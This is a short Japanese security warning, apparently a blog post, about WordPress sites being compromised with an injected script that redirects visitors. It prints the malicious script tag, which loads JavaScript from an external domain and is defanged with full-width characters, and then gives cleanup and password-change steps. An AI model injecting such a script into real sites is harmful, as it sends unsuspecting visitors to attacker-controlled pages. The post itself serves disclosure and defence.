【ご注意】WordPressの不正コード改ざん

WordPressを狙った不正コードによる下記動画のような改ざんが横行しているようです。

下記内容のスクリプトが埋め込まれており、アクセスした人が別ページに飛ばされるといった類のもののようです。

<ｓcript type=’text/javaｓcript’ ｓrc=’https://ｓdb.dancewithme.biz/db.jｓ’></ｓcript>

※ｓは故意に全角に変えております

改ざんされた場合は下記の手順で修正してください。

データベース周り

まず、データベースのバックアップをし、データベースの中に入っている不正コードを削除します。

削除したデータをデータベースに戻し、データベースのパスワードも変更しておきましょう。

WordPressでのチェック

まずログインユーザーのパスワードを変更します。
その後、Wordfence Securityプラグインをインストールします。

使い方はここを参照してください。

チェック後異常箇所を変更します。

Sucuri Securityも使ってスクリプトのスキャンをかけておいたほうが良いでしょう。

皆様、ご注意ください。